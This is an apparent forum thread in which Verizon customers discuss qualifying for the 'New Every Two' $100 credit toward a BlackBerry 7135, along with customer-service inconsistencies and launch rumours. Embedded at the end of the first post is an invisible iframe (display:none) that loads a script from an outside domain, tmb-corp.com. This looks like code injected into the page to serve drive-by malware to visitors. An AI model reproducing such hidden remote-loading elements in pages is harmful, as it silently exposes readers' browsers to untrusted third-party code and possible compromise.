Beside Rebates - How to get $100 off your new 7135
Ok this is for VZ customers only. Sorry Sprint people, but you may have something like this I'm not sure.
When the 7135 launches and you want a $100 off you "may" be lucky enough to qualify for the "New Every Two" program from VZW.
Here's the deal. When you signed up for service or renewed a previous contract, and you signed up for a TWO year contract AND you signed up on a plan $35 a month or higher AND you have not voluntarily upgraded your phone AGAIN at a sale price (subsidised price) then you qualify for $100 towards your next phone with a renewal of a two year contract on a plan $35 and higher.
You must ASK for this when you go to purchase the phone. They (sales reps) will not tell you this (for the most part).. unless you get a savvy rep. You cannot combine this offer with any other rebate offer and it's not good on accessories.
Now what happens if you didn't sign a two year contract, or maybe you had to upgrade your phone last year (because that casual one year warranty expired and funny things all of a sudden started happening to your phone.... funny how that happens).. or maybe you didn't have a $35 or higher plan.............
The other option you have is to call Customer Service and see if there isn't some type of courtesy credit for being good customer, paying on time, and if your lucky your close to the end of your contract and may be a risky churn situation. They do have the ability to offer equipment credit to save you (meaning you could cancel soon without an ETF fee.
Just Food for thought.... and I know I'm probably opening up a can of worms here, but it always helps to know these things.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
Yeah, I've been thinking about this a lot lately since I got the 6035 right when it came out. I believe you can qualify for the New Every Two plan up to two months early. Then I would get it. Yea! Maybe I will be glad that it didn't come out in October.
Yeah the new every two option was "supposed" to be an auto populated option that appeared on the account when you renewed your contract, signed two years and it was $35 and higher.... but..... a glitch in the system was discovered. If you call CS for any type of plan change they can only do a 1 year plan change over the phone (in certain states two year plan changes verbally aren't binding) If CS initiated a new 1 year contract pricing plan it had a tendency to "knock off" the new every two promotion since this feature was imbedded only in two year plan codes, and even though your contract for two years was still valid and your plan was still $35 and higher, now all of a sudden the system doesn't show you haveing the new every two.
So bottom Line..... ASK your sales rep if you qualify!! They do have the ability to "manually" apply the credit, but for compliance purposes they do have to qualify it as legite.

When I called Verizon back in Oct I asked about my account and if I quailified for the NE2 rebate since my phone was two months away from its NE2 anniversary. VZ rep said I would quailfy on my NE2 two-year date, not any sooner. I said I heard you can upgrade within two-months of the date and she said-- nope exactly two years with the same phone to qualify. I asked if it mattered if I changed my service plan during the two years and she said the hardware date is seperate than the service contract date.
So-- I have to wait until Dec 21 for my exact date If I want to save $100 on my 7135..... course the 7135 has to be released by the 21 in order to by it!

Hrmm. Sounds like another case of random answers from random people within Customer Service.
I have been with Verizon Wireless for a while, back before the Bell Atlantic Mobile merger. I just confirmed that I have been onboard since early 1998. They LOVE me. I had a 2yr. contract at one point. Somewhere along the way a promo deal changed that <system glitch?> to a 1 yr. contract. I called to review my contract, and I had notes added to my account to reflect the fact that I do qualify for the New Every Two program even though my current plan is a 1 yr. plan. The exact reason that was given was "Loyal Customer/Customer Satisfaction". In the notes it states that a Managers approval will be required, but is pre-approved by CS at this time.
We also spoke about the ALMIGHTY 7135. The CS rep I spoke with admitted that information regarding the 7135, within Verizon, is random and not easy to find. It seems that depending on the region and the sales support staff in that region, information will varry greatly. This particular fellow was pretty up-to-speed. He offered no exact date for launch, he also made no dirrect comments as to Verizon actually launching the 7135, although He did speak rather freely about the phone being tested in a few regions on the Big V Network, and that what he has heard is that it should be released/launced on Verizon Q1 03 if not sooner pending the passing of tests. He had no spicific test failure information and admitted that that information is highly guarded.
Nothing new here. Just needed to ramble a little, tough day at work. :beer
